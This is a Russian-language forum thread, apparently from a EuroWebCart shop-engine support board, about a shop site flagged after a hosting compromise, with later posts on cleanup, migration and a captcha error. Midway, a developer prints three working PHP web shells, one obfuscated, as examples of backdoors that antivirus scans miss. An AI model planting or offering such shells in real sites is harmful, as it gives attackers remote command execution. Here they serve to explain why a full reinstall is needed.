| |||||||||
| |||||||||
Доброго времени суток, коллеги..
Нашему сайту пошёл второй год и вот на хостинге случилась незадача - хакнули другие домены, которые работают на WP, хостинг приостановили, отсканировали весь на предмет шеллов и сигнатур. Практически все вопросы были решены.
Сейчас хостеры не восстанавливают услугу, просят объяснить назначение фалов в системе Eurowebkart, а именно:
modules/page.php
templates/1/nav_menu.inc
templates/1/stroke.inc
op_chat.php
программисты и создатели, отзовитесь!
Нашему сайту пошёл второй год и вот на хостинге случилась незадача - хакнули другие домены, которые работают на WP, хостинг приостановили, отсканировали весь на предмет шеллов и сигнатур. Практически все вопросы были решены.
Сейчас хостеры не восстанавливают услугу, просят объяснить назначение фалов в системе Eurowebkart, а именно:
modules/page.php
templates/1/nav_menu.inc
templates/1/stroke.inc
op_chat.php
программисты и создатели, отзовитесь!
Все это нормальные файлы EWC (только если их с соседних не заразили, не внедрили шелл)
modules/page.php - модуль выдачи контентных страниц
templates/1/nav_menu.inc - шаблон выдачи верхнего меню
templates/1/stroke.inc - время, дата и все что с ним связано
op_chat.php - чат оператора
посмотрите дату изменения этих файлов - если она старая - то все нормально. эвристические анализаторы реагируют буквально на все. а можно сравнить с файлами в дистрибутиве. Notepad++ и установить плагин Compare
и да - делайте нормальные пароли, делайте обновления движкам, не используйте ИЕ, админьте сайт с машины, через которую не ходите просто так по инету, или поставьте на ней отдельно Убунту какую-нибудь, в дополнении к Windows, чисто для админинья сайтов.
modules/page.php - модуль выдачи контентных страниц
templates/1/nav_menu.inc - шаблон выдачи верхнего меню
templates/1/stroke.inc - время, дата и все что с ним связано
op_chat.php - чат оператора
посмотрите дату изменения этих файлов - если она старая - то все нормально. эвристические анализаторы реагируют буквально на все. а можно сравнить с файлами в дистрибутиве. Notepad++ и установить плагин Compare
и да - делайте нормальные пароли, делайте обновления движкам, не используйте ИЕ, админьте сайт с машины, через которую не ходите просто так по инету, или поставьте на ней отдельно Убунту какую-нибудь, в дополнении к Windows, чисто для админинья сайтов.
и это не первый случай ошибок анализаторов.
видать есть какие то сигнатуры, совпадающие с тем что есть в вирусах. знать бы какие - я бы немного подправил код, чтобы антивирусы не реагировали.
видать есть какие то сигнатуры, совпадающие с тем что есть в вирусах. знать бы какие - я бы немного подправил код, чтобы антивирусы не реагировали.
Спасибо.
Это не единственные файлы, на которые у nic.ru сработал антивирус. Была внедрена папка и ещё кое-какие рассыльники. Но вот именно эти файлы я помню что были в дистрибьютиве точно, поэтому есть за что побороться
)
Про Compare не знала, полезный плагин, сейчас попробую!
Это не единственные файлы, на которые у nic.ru сработал антивирус. Была внедрена папка и ещё кое-какие рассыльники. Но вот именно эти файлы я помню что были в дистрибьютиве точно, поэтому есть за что побороться
Про Compare не знала, полезный плагин, сейчас попробую!
что они в stroke.inc то откопали? малюсенький он.
не понравились комментарии ####?
в op_chat.php нет их, но все равно..
думаю просто параноидальный поиск. программер сигнатуры в антивирь воткнул слишком неуникальные.
не понравились комментарии ####?
в op_chat.php нет их, но все равно..
думаю просто параноидальный поиск. программер сигнатуры в антивирь воткнул слишком неуникальные.
боюсь вам требуется полная очистка и переустановка EWC с применением следующих правил:
ибо шелл может сидеть очень далеко и глубоко и не будет обнаружен антивирями
как к примеру вы обнаружите такой простой шелл:
или вот - самый маленький шелл:
или вот - чудеса обфускации:
вариантов очень много. мое мнение - чистить все. и заново.
и да - делайте нормальные пароли, делайте обновления движкам, не используйте ИЕ, админьте сайт с машины, через которую не ходите просто так по инету, или поставьте на ней отдельно Убунту какую-нибудь, в дополнении к Windows, чисто для админинья сайтов.
ибо шелл может сидеть очень далеко и глубоко и не будет обнаружен антивирями
как к примеру вы обнаружите такой простой шелл:
<? include $_GET['url']; ?>
или вот - самый маленький шелл:
<?=@`$c`?>
или вот - чудеса обфускации:
<?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
?>
вариантов очень много. мое мнение - чистить все. и заново.
Я подумаю над этим, ведь эта переустановка ВСЕГО дизайна и настроек... Работы на несколько месяцев...
И помогать мне некому...
И помогать мне некому...
ну тогда заходите во все папки - подпапки - не поленитесь пройти все и ищите php файлы, которых там не должно быть. особенно если он там один в какой то папке сидит.
@чудеса обфускации@ - крутой код! такого ещё не встречала!! 
вопрос (не в тему все-же) как базы переносить и вообще все что нужно, если решу все-таки новую систему EWC поставить?
вопрос (не в тему все-же) как базы переносить и вообще все что нужно, если решу все-таки новую систему EWC поставить?
как всегда даю ссылку
www.eurowebcart.ru
но у вас проще. обновлять не надо!
надо все скачать с ФТП или по FTP перекинуть куда-нибудь в /OOOOLLLDDD12345
это пара секунд по фтп. в дальнейшем оттуда будете брать что надо.
установить все заново, настроить, вкачать базы db_index.txt который
ну и так далее. читайте инструкцию.
www.eurowebcart.ru
но у вас проще. обновлять не надо!
надо все скачать с ФТП или по FTP перекинуть куда-нибудь в /OOOOLLLDDD12345
это пара секунд по фтп. в дальнейшем оттуда будете брать что надо.
установить все заново, настроить, вкачать базы db_index.txt который
ну и так далее. читайте инструкцию.
вообще желательно на 1 хостинге - 1 движок иметь, ибо проблем не оберешься, если один из сайтов ломанут. не узнаешь источник заразы. хотя как правило - это схлопачивание апплетов, вредоносных js, vb, swf которые подтягивают другую заразу - ищут FTP менеджеры и скоренько ставят шеллы.
или как в случае с ворпрессом - брутфорс и дыры устаревших релизов, а также дыры в постороннем ПО - особенно это касается счетчиков всяких и красивых украшательств.
или как в случае с ворпрессом - брутфорс и дыры устаревших релизов, а также дыры в постороннем ПО - особенно это касается счетчиков всяких и красивых украшательств.
В новом дистрибьютиве сканер
помимо (понятно кто разработчик)
www.eurowebcart.ru - 20 ссылок
www.eurowebcart.ru - 8 ссылок
так-же нашёл скрытые ссылки на
www.infobox.ru - 1 ссылка
www.dpz.ru - 3! ссылки
www.evalux.ru - 1 ссылка
не очень понятно зачем они у меня будут висеть на сайте...
помимо (понятно кто разработчик)
www.eurowebcart.ru - 20 ссылок
www.eurowebcart.ru - 8 ссылок
так-же нашёл скрытые ссылки на
www.infobox.ru - 1 ссылка
www.dpz.ru - 3! ссылки
www.evalux.ru - 1 ссылка
не очень понятно зачем они у меня будут висеть на сайте...
все ссылки на ewc(кроме 1) и 24ok - убраны в новых версиях дистрибутива. планируется, что партнеры могут не светить eurowebcart.ru
насчет Infobox dpz и evalux - это в демобазе рабочие примеры заполнения генератора каталогов и серверного обмена, а также ссылка на тариф инфобокса в хелпе.
так что не парьтесь - их все равно никто не увидит. а вообще спасибо за инфу - уберу.
насчет Infobox dpz и evalux - это в демобазе рабочие примеры заполнения генератора каталогов и серверного обмена, а также ссылка на тариф инфобокса в хелпе.
так что не парьтесь - их все равно никто не увидит. а вообще спасибо за инфу - уберу.
качайте 7.26 - я постарался убрать все что можно заменив реальные ссылки на ВАШ_САЙТ
но не устанавливайте демо-базу.
www.dropbox.com
но не устанавливайте демо-базу.
www.dropbox.com
Уважаемый, посмотрела на график своей занятости. Буду полностью переделывать (слава Богу) сайт только ближе к лету.....
А сейчас после чисток от вирусняков, все работает как и было, только немножечко слетели некоторые дизайны...
Вот незадача: странный творится момент - при заказе - в самом конце оформления, после нажатия кнопки "отправить заказ" - выскакивает сообщение "Вы неверно ввели контрольное число!" , хотя чисел там контрольных в помине нет, что-то конфраактует...
Что бы это могло быть?
А сейчас после чисток от вирусняков, все работает как и было, только немножечко слетели некоторые дизайны...
Вот незадача: странный творится момент - при заказе - в самом конце оформления, после нажатия кнопки "отправить заказ" - выскакивает сообщение "Вы неверно ввели контрольное число!" , хотя чисел там контрольных в помине нет, что-то конфраактует...
Что бы это могло быть?
Включите капчу при оформлении посмотрите что будет. В основных параметрах
Гость: Включите капчу при оформлении посмотрите что будет. В основных параметрах
Картинку капчи не показывает, ...
значит попортили капчу то.
вспоминайте какая у вас версия дистрибутива и заберите папку captcha оттуда.
можете попробовать из новой версии забрать - там модернизированная.
вспоминайте какая у вас версия дистрибутива и заберите папку captcha оттуда.
можете попробовать из новой версии забрать - там модернизированная.